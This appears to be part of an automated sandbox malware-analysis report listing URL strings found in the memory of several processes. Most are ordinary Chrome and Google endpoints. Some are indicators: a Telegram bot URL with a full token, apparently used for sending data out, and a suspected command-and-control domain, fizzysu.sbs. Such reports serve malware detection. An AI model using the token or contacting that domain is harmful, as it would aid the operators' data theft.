Source: chrome.exe, 0000002E.00000003.3132599681.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132646553.00002AD800D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236609081.00002AD800CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 0000002E.00000003.3132599681.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132646553.00002AD800D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236609081.00002AD800CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 0000002E.00000003.3132599681.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132646553.00002AD800D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236609081.00002AD800CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: driver3.exe, 00000020.00000002.3346748725.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp, driver3.exe, 00000020.00000000.2961620464.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage
Source: driver3.exe, 00000020.00000002.3222957219.0000020E7B418000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7796466207:AAFr4eJop5lV1qGyhuFlMc4hIV2ErcSZ_4E
Source: driver3.exe, 00000020.00000002.3222957219.0000020E7B418000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7796466207:AAFr4eJop5lV1qGyhuFlMc4hIV2ErcSZ_4E/sendMessage
Source: chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: chrome.exe, 0000002E.00000002.3233046357.00002AD800794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3239699523.00002AD801108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 0000002E.00000002.3236503899.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3133512710.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160795120.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3144041851.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3138932472.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 0000002E.00000002.3236559772.00002AD800CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 0000002E.00000002.3236559772.00002AD800CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 0000002E.00000002.3236394953.00002AD800C6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 0000002E.00000002.3236394953.00002AD800C6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 0000002E.00000002.3236394953.00002AD800C6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229329833.00002AD8003AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000002E.00000003.3136534048.00002AD800D64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000002E.00000002.3230437339.00002AD8005A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 0000002E.00000002.3230954322.00002AD800618000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3240366901.00002AD801238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3230437339.00002AD8005A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3235016954.00002AD8009F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 0000002E.00000002.3240366901.00002AD801238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en8
Source: chrome.exe, 0000002E.00000002.3230954322.00002AD800618000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enk
Source: chrome.exe, 0000002E.00000002.3236798798.00002AD800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132507634.00002AD800D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132415607.00002AD800D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139037821.00002AD80042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3133637436.00002AD800D38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132309352.00002AD80042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139082965.00002AD800D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3136534048.00002AD800D64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000002E.00000002.3227797865.00002AD80001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstorekgejglhpjiefppelpmljglcjbhoiplfn
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 0000002E.00000002.3227797865.00002AD80001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 0000002E.00000003.3083140803.000078A8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3083194608.000078A8002E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000002E.00000003.3128824327.00002AD8006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3230560741.00002AD8005D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3227797865.00002AD80001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3230391636.00002AD800584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3231556898.00002AD800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 0000002E.00000002.3233046357.00002AD800794000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 0000002E.00000002.3230954322.00002AD800618000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: powershell.exe, 00000001.00000002.2194388552.00000000062FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2194388552.00000000062FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2194388552.00000000062FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: chrome.exe, 0000002E.00000002.3235513703.00002AD800AB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: LCESjzR.tmp, 0000001E.00000002.3071709090.00000000008EC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: LCESjzR.tmp, 0000001E.00000002.3071709090.00000000008EC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: LCESjzR.tmp, 0000001E.00000002.3071709090.00000000008EC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0.
Source: chrome.exe, 0000002E.00000002.3229095455.00002AD800324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 0000002E.00000002.3228918464.00002AD8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 0000002E.00000002.3228918464.00002AD8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002E.00000002.3233046357.00002AD800794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3239699523.00002AD801108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 0000002E.00000002.3228918464.00002AD8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002E.00000002.3233046357.00002AD800794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3239699523.00002AD801108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 0000002E.00000002.3229095455.00002AD800324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 0000002E.00000002.3229095455.00002AD800324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 0000002E.00000002.3229095455.00002AD800324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googlP2
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3139722722.00002AD8012A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 0000002E.00000002.3229296923.00002AD80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002E.00000002.3236559772.00002AD800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3230437339.00002AD8005A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 0000002E.00000002.3230437339.00002AD8005A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236503899.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3133512710.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160795120.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3144041851.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3138932472.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236559772.00002AD800CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 0000002E.00000002.3236559772.00002AD800CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/-end-point:
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs//Bo
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/3
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000BD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/4
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/6
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/;BS
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/WB
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs;
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs_B?
Source: powershell.exe, 00000001.00000002.2182467188.00000000053E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2182467188.0000000005A76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/F
Source: chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3227763457.00002AD80000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 0000002E.00000002.3230437339.00002AD8005A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
